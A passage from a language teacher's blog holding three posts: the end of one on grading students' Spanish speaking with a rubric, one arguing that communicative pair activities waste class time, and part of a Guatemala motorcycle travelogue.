errors interfere with communication?</p> <p>Every two weeks, I give each kid a score out of three. At the end of the year, I average these and that&#8217;s their oral mark. If the kids disagree, they can come in for a formal oral interview. (If they choose this, it is totally unstructured and unplanned ie they cannot prepare and memorise Qs &amp; As. I will ask them to tell me a story including dialogue, and we will basically ask each other questions.) I have to be conscious: some days kids are sick, exhausted etc, so the score has to reflect their overall (ie best possible) proficiency.</p> <p>This is the first year I have done this and not a single kid complained about their mark.</p> <p>Here&#8217;s the marking rubric. Go ahead and steal it but please acknowledge authorship.&nbsp; Note that the rubric will generate a mark between four and twelve.</p> <p><strong><em>Oral proficiency is evaluated in the last ¼ of Spanish 11. I will note how you communicate in class. If you disagree with your oral mark, please come in for a one-on-one interview. I am available Fridays after 2:30.<br /> </em></strong><br /> <strong><em>When using Spanish, for a score of ___, I </em></strong><br /> <strong><em>3 (mastery)&nbsp;</em></strong><br /> <strong><em>&#8212; ask and answer questions in complete sentences.</em></strong><br /> <strong><em>&#8212; initiate and sustain conversations.<br /> &#8212; demonstrate understanding of what is being said to me</em></strong><br /> <strong><em>&#8212; have minor errors that do not interfere with meaning<br /> </em></strong><br /> <strong><em>2 (basic proficiency)</em></strong><br /> <strong><em>&#8212; occasionally ask and answer questions in complete sentences</em></strong><br /> <strong><em>&#8212; sometimes initiate and sustain conversations</em></strong><br /> <strong><em>&#8212; generally demonstrate understanding of what is being said to me<br /> &#8212; have errors that noticeably interfere with meaning</em></strong><br /> <strong><em><br /> 1 (not yet proficient)&nbsp;</em></strong><br /> <strong><em>&#8212; use mostly one-word statements</em></strong><br /> <strong><em>&#8212; don’t sustain or initiate conversations<br /> &#8212; often don&#8217;t clearly understand what is being said to me</em></strong><br /> <strong><em>&#8212; have errors that consistently block meaning</em></strong></p> </div><!-- .entry-content --> <footer class="entry-meta"> Posted in <a href="https://tprsquestionsandanswers.wordpress.com/category/assessment-and-evaluation/" rel="category tag">Assessment and Evaluation</a>, <a href="https://tprsquestionsandanswers.wordpress.com/category/best-practices/" rel="category tag">Best Practices</a>, <a href="https://tprsquestionsandanswers.wordpress.com/category/uncategorized/" rel="category tag">Uncategorized</a> <span class="on-date"> on <a href="https://tprsquestionsandanswers.wordpress.com/2019/02/25/oral-assessment-made-easy/" title="7:50 pm" rel="bookmark"><time class="entry-date" datetime="2019-02-25T19:50:37+00:00">February 25, 2019</time></a></span><span class="by-author"> by <span class="author vcard"><a class="url fn n" href="https://tprsquestionsandanswers.wordpress.com/author/cstolztprs/" title="View all posts by cstolztprs" rel="author">cstolztprs</a></span></span>. <a href="https://tprsquestionsandanswers.wordpress.com/2019/02/25/oral-assessment-made-easy/#comments">3 Comments</a> </footer><!-- .entry-meta --> </article><!-- #post-# .#post-class-# --> <article id="post-11275" class="post-11275 post type-post status-publish format-standard hentry category-legacy-methods category-uncategorized"> <a href="https://tprsquestionsandanswers.wordpress.com/2019/01/24/communicative-pair-activities/" rel="bookmark"> <header class="entry-header"> <h1 class="entry-title">Communicative Pair Activities</h1> </header><!-- .entry-header --> </a> <div class="entry-content"> <p>Today somebody posted this:</p> <p><img data-attachment-id="11276" data-permalink="https://tprsquestionsandanswers.wordpress.com/2019/01/24/communicative-pair-activities/img_1888/" data-orig-file="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1888.jpg" data-orig-size="750,411" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="img_1888" data-image-description="" data-medium-file="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1888.jpg?w=300" data-large-file="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1888.jpg?w=620" src="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1888.jpg?w=620" class="size-full wp-image-11276" srcset="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1888.jpg?w=620 620w, https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1888.jpg?w=150 150w, https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1888.jpg?w=300 300w, https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1888.jpg 750w" sizes="(max-width: 620px) 100vw, 620px" ></p> <p>This is a standard problem with this activity,&nbsp; recommended by textbooks, ACTFL and methods teachers etc, and known as the &#8220;<strong>Communicative Pair Activity</strong>,&#8221; or CPA, wherein students interact in the target language to express and get information about themselves and each other.&nbsp; These activities are also known as &#8220;information gap activities.&#8221;</p> <p>Today&#8217;s question:&nbsp;<strong>are CPAs worth bothering with?</strong></p> <p>Answer:&nbsp;<strong>not really, but sometimes you have to.</strong></p> <p>There a bunch of reasons why CPAs are not worth doing.&nbsp; Here they are, in no particular order.</p> <p>1)<strong> The fake &amp; boring&nbsp; factor</strong>. Using a second language to ask questions <strong>a.&nbsp;</strong>to which one probably already knows the answer, and <strong>b.&nbsp;</strong>which would be<em> much</em> more easily asked and answered in L1, feels fake and contrived. And the level of questions in a typical language class&#8211;&nbsp;<em>do you like skateboarding? do you prefer red dresses or pink ones?</em> &#8212; is waaay below the cognitive level of most students. Kids want to feed, not starve, their heads. As an adult, I&nbsp;<em>haaaate</em> those stupid &#8220;find somebody who&#8230;&#8221; mixers at social or profesisonal functions.</p> <p>Jody Noble, as usual, nails it:</p> <p><img data-attachment-id="11281" data-permalink="https://tprsquestionsandanswers.wordpress.com/2019/01/24/communicative-pair-activities/img_1895/" data-orig-file="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1895.jpg" data-orig-size="750,339" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="img_1895" data-image-description="" data-medium-file="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1895.jpg?w=300" data-large-file="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1895.jpg?w=620" src="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1895.jpg?w=620" class="size-full wp-image-11281" srcset="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1895.jpg?w=620 620w, https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1895.jpg?w=150 150w, https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1895.jpg?w=300 300w, https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1895.jpg 750w" sizes="(max-width: 620px) 100vw, 620px" ></p> <p>2)&nbsp;<strong>The policing factor</strong>. Because CPAs feel fake, kids find them silly, and won&#8217;t do them, which turns the teacher into a cop who patrols for English usage.&nbsp; Ugh. The smarter kids will use the TL only when the teacher swings by, to keep the teacher off their backs.</p> <p>3) <strong>The linguistic junk food factor.</strong>&nbsp;Kids&#8211; even the ones who actually&nbsp;<em>want</em> to do CPAs&#8211; are&nbsp;<em>learners.<strong>&nbsp;&nbsp;</strong></em>And learners, despite their best intentions, make mistakes.&nbsp; And Partner A&#8217;s mistakes become poor input for Partner B. And vice-versa. Since we learn by processing linguistic input, there is no point in providing poor input to our students. I used to see stuff like the following all the time when I was a skill-builder:</p> <p><em>¿Te gusta ver la tele?</em><br /> <em>&#8212; Sí, te gusta ver la tele.&nbsp; ¿Te gusta ver la tele?</em><br /> <em>Sí, te gusta.</em></p> <p>Is there meaning being exchanged?&nbsp; Yes.&nbsp; Is the language quality?&nbsp; No.</p> <p>Terry Waltz succinctly sums this up: &#8220;<strong>communicative pair activities are the McDonalds of language teaching</strong>.&#8221;&nbsp; And Bill VanPatten writes that &#8220;to the extent that output activities ask learners to produce what they are trying to acquire, they put the cart before the horse.&#8221;</p> <p>4)&nbsp;<strong>The inefficiency factor</strong>. When we include off-task time (a lot), poor input (frequent), and a lot of time setting up, policing and then debriefing CPAs, there is not actually a whole lot of communication going on per unit of classroom time.</p> <p>I rough-calculated this.&nbsp; Years ago, when I used the ¡Juntos! program, there would be a CPA such as&nbsp;<em>ask your partner and have them ask you if they like the following sports</em>, and kids would have to ask eight questions:&nbsp;<em>do you like basketball? Do you like hockey?</em> etc.</p> <p>For a 10-question Q&amp;A, I would give kids 5 minutes. In 5 minutes&#8211;&nbsp;<em>if</em> they were actually focused on the activity&#8211; they would hear&nbsp;<em>do you like ___?&nbsp;</em>and&nbsp;<em>I like ____</em>&nbsp;sixteen times.</p> <p>How many repetitions of <em>I like&#8230;do you like&#8230;?</em> can I get using a basic C.I. technique such as asking an actor questions and having them ask me (a parallel character in the story) questions? I timed myself asking a student these, and in thirty seconds I got 8 repetitions of&nbsp;<em>do you like&#8230;? I like&#8230;&nbsp;</em>In&nbsp;<em>one minute</em>, I would get 16 repetitions, and in five minutes, I would get&nbsp;<em>eighty</em>.&nbsp; Now, obviously, I&#8217;m not spending five minutes asking the actor the same question, but the point stands: focused, teacher-provided input is&nbsp;<em>massively</em> more efficient than communicative pair work.</p> <p>I can also ensure the output is accurate, and that the class is listening (and getting TL input, and not English).&nbsp; The teacher, especially in a TPRS or other story classroom, can get students to focus by ensuring that the exchange is&nbsp;<em>memorable</em>: instead of asking tedious obvious questions such as&nbsp;<em>do you like hamburgers?</em>, the teacher can ask the actor&nbsp;<em>do you like fighting dragons or knights?</em>&nbsp;or&nbsp;<em>do you like dancing with Ryan Gosling or with Post Malone?&nbsp;</em>Finally, the teacher can ensure that the language used is actually understood&#8211; comprehended, as Terry Waltz puts it.</p> <p>As one person recently posted on the Facebook group <a href="https://www.facebook.com/groups/1223948674380441/">CI FIGHT CLUB</a>, &#8220;<em>CPAs as a student always made me feel like language class was insulting my intelligence</em>.&#8221;</p> <p>Finally, remember this:&nbsp;&nbsp;<strong>people do not need to speak a language in order to learn to speak it</strong>. You do&nbsp;<em>not</em> need to &#8220;make kids talk&#8221; to teach them to talk.&nbsp; If they hear enough comprehensible input, and it&#8217;s repeated enough, they will first understand, and then later, be able to speak.</p> <p>So go ahead: model dialogue, interrogate your actors (or your students during PQA, or&nbsp;<em>persona especial</em>), talk about yourself, whatever&#8230;pretty much anything is going to provide more, better and <em>more interesting</em> input than communicative pair activities.</p> <p><strong>CAVEAT MAGISTER:</strong></p> <p>There are occasionally reasons to do CPAs. As Mike Peto reminds us, if you have ten minutes to spare, reading is a much better use of time than a CPA, but but but&#8230;</p> <p>a. you may have to do CPAs (ie your Defartment Headz might be in a position to dictate what you do in your class, and your job might ride on giving Headz what they want).</p> <p>b. your Adminz might believe&nbsp;<em>talking is how people acquire languagezzz.</em>&nbsp;If you are getting observed, a CPA or two&#8211; after which you call on your two biggest egg-heads to eg. &#8220;model successful completion of learning objective&#8221;&#8211; will satisfy people with boxes to tick.</p> <p>&nbsp;</p> <p>&nbsp;</p> <p>&nbsp;</p> <p>&nbsp;</p> <p>&nbsp;</p> <p>&nbsp;</p> <p>&nbsp;</p> <p>&nbsp;</p> <p>&nbsp;</p> <p>&nbsp;</p> <p>&nbsp;</p> </div><!-- .entry-content --> <footer class="entry-meta"> Posted in <a href="https://tprsquestionsandanswers.wordpress.com/category/legacy-methods/" rel="category tag">legacy methods</a>, <a href="https://tprsquestionsandanswers.wordpress.com/category/uncategorized/" rel="category tag">Uncategorized</a> <span class="on-date"> on <a href="https://tprsquestionsandanswers.wordpress.com/2019/01/24/communicative-pair-activities/" title="9:06 pm" rel="bookmark"><time class="entry-date" datetime="2019-01-24T21:06:02+00:00">January 24, 2019</time></a></span><span class="by-author"> by <span class="author vcard"><a class="url fn n" href="https://tprsquestionsandanswers.wordpress.com/author/cstolztprs/" title="View all posts by cstolztprs" rel="author">cstolztprs</a></span></span>. <a href="https://tprsquestionsandanswers.wordpress.com/2019/01/24/communicative-pair-activities/#comments">1 Comment</a> </footer><!-- .entry-meta --> </article><!-- #post-# .#post-class-# --> <article id="post-11218" class="post-11218 post type-post status-publish format-standard hentry category-uncategorized"> <a href="https://tprsquestionsandanswers.wordpress.com/2018/12/30/motorcycle-riding-in-guatemala-%f0%9f%8f%8d%f0%9f%8f%8d%f0%9f%8f%8d/" rel="bookmark"> <header class="entry-header"> <h1 class="entry-title">Motorcycle Riding in Guatemala&nbsp;🏍🏍🏍</h1> </header><!-- .entry-header --> </a> <div class="entry-content"> <p>This post is not about language teaching.</p> <p>Tina, her brother Bobby and I decided to spend two weeks in Guatemala over Christmas, touring on motorcycles. We rented from Simoon online. First we spent three days at the beach in Monterrico.</p> <p>We picked up the bikes in Antigua. They are RTM 250s. The small-dick-big-belly-big-motor crowd is giggling <em>1000 cc or GTFO</em>. I was a bit sceptical too, having spent most of my riding time on a 750. We didn&#8217;t have dedicated bags, so backpacks and bungees it was for gear.</p> <p>From Antigua it was about 20 minutes to the Carretera Panamericana on first cobbles and then a smooth two-laner.</p> <p>Town and village riding basically comes down to: look around, go slow, use your well-adjusted mirrors, and go when you have to.</p> <p>From the junction, we headed north toward Chichicastenango. The highway was fine: smooth, and most Guatemalan traffic isn’t going much past 80. The carretera runs smack through the middle of Chimaltenango (although a new bypass will open soon) at which point we learned the <strong>First Rule of Riding in Guatemala: whatever goes, goes. </strong>Cut lanes? Ride in the ditch? Ride to the left of oncoming traffic? All good.</p> <p>And yes, you can do all of this around— and with&#8211; Guatemalan cops, providing you follow the <strong>Second Rule of Riding in Guatemala: don’t be an idiot</strong>. If it’s reasonable and doesn’t <em>look </em>dangerous, go ahead.</p> <p>We rode past, through and around at least 3 km of stalled traffic and then were home free. Shortly past Chimaltenango, we had our first and only “accident.” As I pulled off the road, the bike moving at about 1 kmh with feet off the pegs, a fraction too much brake tipped the bike. Bob, a few hundred meters behind, pulled over and did the same.</p> <p>Unscratched, we righted the bikes, having learned <strong>The Third Rule of Riding in Guatemala: road-edges are dangerous. </strong>Because of low budgets, corruption, bad design or whatever, most Guatemalan roads go straight from driving lane to dirt— no shoulder— often with a good bit of dirt or gravel on the edge of the pavement.</p> <p>On one straight stretch, I got the bike up to 100 and that was as fast as I would go in two weeks. My cynicism about the 250s evaporated. I had thought,<em> maybe I should spend three times as much and rent a BMW,</em> but the decision to get 250s was right: much cheaper insurance and rentals, and no real way to let a GS do what it’s meant to do on these roads.</p> <p>We spent the evening in Los Encuentros, as Tina was tired and darkness encroached. At dinner, in a <em>comedor</em> off the highway to Chichi, we watched a parade of lightless cars and bikes, animals and pedestrians stroll along the 15. Here, we correctly deduced <strong>The Fourth Rule of Riding in Guatemala: Do <em>Not</em> Ride At Night. </strong>Yes, yes, I know: you have 300,000 accident-free miles and ten bikes under your belt. But in Guatemala you are dealing with the following at night:</p> <p>◦ animals, sometimes in herds</p> <p>◦ people, often drunk, generally unreflective</p> <p>◦ pets</p> <p>◦ cyclists, generally like pedestrians</p> <p>◦ vehicles with no lights</p> <p>◦ epic and unmarked potholes</p> <p>◦ literally any object</p> <p>◦<em> topes</em>, aka speedbumps, often unmarked</p> <p><img data-attachment-id="11231" data-permalink="https://tprsquestionsandanswers.wordpress.com/2018/12/30/motorcycle-riding-in-guatemala-%f0%9f%8f%8d%f0%9f%8f%8d%f0%9f%8f%8d/img_1754/" data-orig-file="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1754.jpg" data-orig-size="750,851" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="img_1754" data-image-description="" data-medium-file="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1754.jpg?w=264" data-large-file="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1754.jpg?w=620" class="size-full wp-image-11231" src="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1754.jpg?w=620" srcset="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1754.jpg?w=620 620w, https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1754.jpg?w=132 132w, https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1754.jpg?w=264 264w, https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1754.jpg 750w" sizes="(max-width: 620px) 100vw, 620px" /></p> <p>The next morning we slurped awful Nescafé along with fantastic <em>churrascos con frijól</em> in the just-above-freezing sun. When we went to start the bikes, two wheezed and then died. Luckily Guatamala is full of hills and we were on top of one, so roll starts got the janky beasts going.</p> <p>The 15 toward Chichicastenango has been recently repaved and was our introduction to proper Guatemalan riding: moderate traffic, crazy curves, steep ups and downs, and magnificent pine forests and <em>milpas</em> (cornfields). I rode visor up, as 40 is about as fast as you can go.</p> <p>In Chichi we paid $2 per bike for safe parking and in the market Tina and I got our lucky toucan masks for the bikes.</p> <p><img class="size-full" src="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1517.jpg?w=620" /></p> <p>From Chichi it was 20 minutes to Santa Cruz del Quiché, which is Chichi minus the tourists.</p> <p><img data-attachment-id="11232" data-permalink="https://tprsquestionsandanswers.wordpress.com/2018/12/30/motorcycle-riding-in-guatemala-%f0%9f%8f%8d%f0%9f%8f%8d%f0%9f%8f%8d/img_1755/" data-orig-file="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1755.jpg" data-orig-size="750,855" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="img_1755" data-image-description="" data-medium-file="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1755.jpg?w=263" data-large-file="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1755.jpg?w=620" class="size-full wp-image-11232" src="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1755.jpg?w=620" srcset="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1755.jpg?w=620 620w, https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1755.jpg?w=132 132w, https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1755.jpg?w=263 263w, https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1755.jpg 750w" sizes="(max-width: 620px) 100vw, 620px" /><img data-attachment-id="11233" data-permalink="https://tprsquestionsandanswers.wordpress.com/2018/12/30/motorcycle-riding-in-guatemala-%f0%9f%8f%8d%f0%9f%8f%8d%f0%9f%8f%8d/img_1756/" data-orig-file="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1756.jpg" data-orig-size="750,847" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="img_1756" data-image-description="" data-medium-file="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1756.jpg?w=266" data-large-file="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1756.jpg?w=620" class="size-full wp-image-11233" src="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1756.jpg?w=620" srcset="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1756.jpg?w=620 620w, https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1756.jpg?w=133 133w, https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1756.jpg?w=266 266w, https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1756.jpg 750w" sizes="(max-width: 620px) 100vw, 620px" /></p> <p>The next day we split: I north and Tina and Bobby to Lake Atitlán. I was aiming for Nebaj, high in the Cuchumatán range. Maps said it was 90 km and would take 2:17. <em>Ya right</em>, I thought, <em>even I on this 250 can do better than that. </em></p> <p>The road north from Chichi was poor: potholes and gravel bars, but the scenery was stunning. There were 10 km of gravel, and then, as the loooong descent to Sacapulas began, the road became a silky brand-new blacktop. Other than the unmarked <em>topes</em> in the tiny hamlets, this was perfect pavement.</p> <p>From semitropical Sacapulas the road went basically straight up to Nebaj with more stunning scenery. Some of the hairpins were so tight and steep I took them in two. A bigger moto would have done nothing for speed here, but probably would have cut down the amount of shifting.</p> <p>Nebaj was as it was twenty-five years ago, only in three stories and with cellphones: smoky, orange in the afternoon light, and calm. I rode to Chacmul for lunch. It was market day, and a fair number of unacompanied men were drunk. Many of them stumbled off to motorcycles and headed homeward, wearing the Guatemalan motorcycle helmet: a hoodie.</p> <p><img data-attachment-id="11234" data-permalink="https://tprsquestionsandanswers.wordpress.com/2018/12/30/motorcycle-riding-in-guatemala-%f0%9f%8f%8d%f0%9f%8f%8d%f0%9f%8f%8d/img_1757/" data-orig-file="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1757.jpg" data-orig-size="750,864" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="img_1757" data-image-description="" data-medium-file="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1757.jpg?w=260" data-large-file="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1757.jpg?w=620" class="size-full wp-image-11234" src="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1757.jpg?w=620" srcset="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1757.jpg?w=620 620w, https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1757.jpg?w=130 130w, https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1757.jpg?w=260 260w, https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1757.jpg 750w" sizes="(max-width: 620px) 100vw, 620px" /></p> <p><img data-attachment-id="11242" data-permalink="https://tprsquestionsandanswers.wordpress.com/2018/12/30/motorcycle-riding-in-guatemala-%f0%9f%8f%8d%f0%9f%8f%8d%f0%9f%8f%8d/img_1634/" data-orig-file="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1634.jpg" data-orig-size="2448,3264" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;2.2&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;iPhone 6&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1546069019&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;4.15&quot;,&quot;iso&quot;:&quot;32&quot;,&quot;shutter_speed&quot;:&quot;0.0010615711252654&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="img_1634" data-image-description="" data-medium-file="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1634.jpg?w=225" data-large-file="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1634.jpg?w=620" class="size-full wp-image-11242" src="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1634.jpg?w=620" srcset="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1634.jpg?w=620 620w, https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1634.jpg?w=1240 1240w, https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1634.jpg?w=113 113w, https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1634.jpg?w=225 225w, https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1634.jpg?w=768 768w" sizes="(max-width: 620px) 100vw, 620px" />Nebaj in the morning.</p> <p>The next day’s ride went back to Sacapulas, and then through fast, undulating pine and corn with even more amazing views to Chiantla and then basically vertically up through a boulders-and-pine desert to Todos Santos, nestled among hanging forests, woodsmoke and cloud high in the Cuchumatán mountains.</p> <p><img data-attachment-id="11235" data-permalink="https://tprsquestionsandanswers.wordpress.com/2018/12/30/motorcycle-riding-in-guatemala-%f0%9f%8f%8d%f0%9f%8f%8d%f0%9f%8f%8d/img_1758/" data-orig-file="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1758.jpg" data-orig-size="750,865" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="img_1758" data-image-description="" data-medium-file="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1758.jpg?w=260" data-large-file="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1758.jpg?w=620" class="size-full wp-image-11235" src="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1758.jpg?w=620" srcset="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1758.jpg?w=620 620w, https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1758.jpg?w=130 130w, https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1758.jpg?w=260 260w, https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1758.jpg 750w" sizes="(max-width: 620px) 100vw, 620px" /></p> <p><img data-attachment-id="11243" data-permalink="https://tprsquestionsandanswers.wordpress.com/2018/12/30/motorcycle-riding-in-guatemala-%f0%9f%8f%8d%f0%9f%8f%8d%f0%9f%8f%8d/img_1649/" data-orig-file="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1649.jpg" data-orig-size="11986,2976" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;2.2&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;iPhone 6&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1546090952&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;4.15&quot;,&quot;iso&quot;:&quot;32&quot;,&quot;shutter_speed&quot;:&quot;0.00035398230088496&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="img_1649" data-image-description="" data-medium-file="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1649.jpg?w=300" data-large-file="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1649.jpg?w=620" class="size-full wp-image-11243" src="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1649.jpg?w=620" srcset="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1649.jpg?w=620 620w, https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1649.jpg?w=1240 1240w, https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1649.jpg?w=150 150w, https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1649.jpg?w=300 300w, https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1649.jpg?w=768 768w, https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1649.jpg?w=1024 1024w" sizes="(max-width: 620px) 100vw, 620px" />Views west from the <em>cumbre</em> between Chiantla and Todos Santos.</p> <p><img data-attachment-id="11244" data-permalink="https://tprsquestionsandanswers.wordpress.com/2018/12/30/motorcycle-riding-in-guatemala-%f0%9f%8f%8d%f0%9f%8f%8d%f0%9f%8f%8d/img_1652/" data-orig-file="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1652.jpg" data-orig-size="2448,3264" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;2.2&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;iPhone 6&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1546096567&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;4.15&quot;,&quot;iso&quot;:&quot;32&quot;,&quot;shutter_speed&quot;:&quot;0.00045495905368517&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="img_1652" data-image-description="" 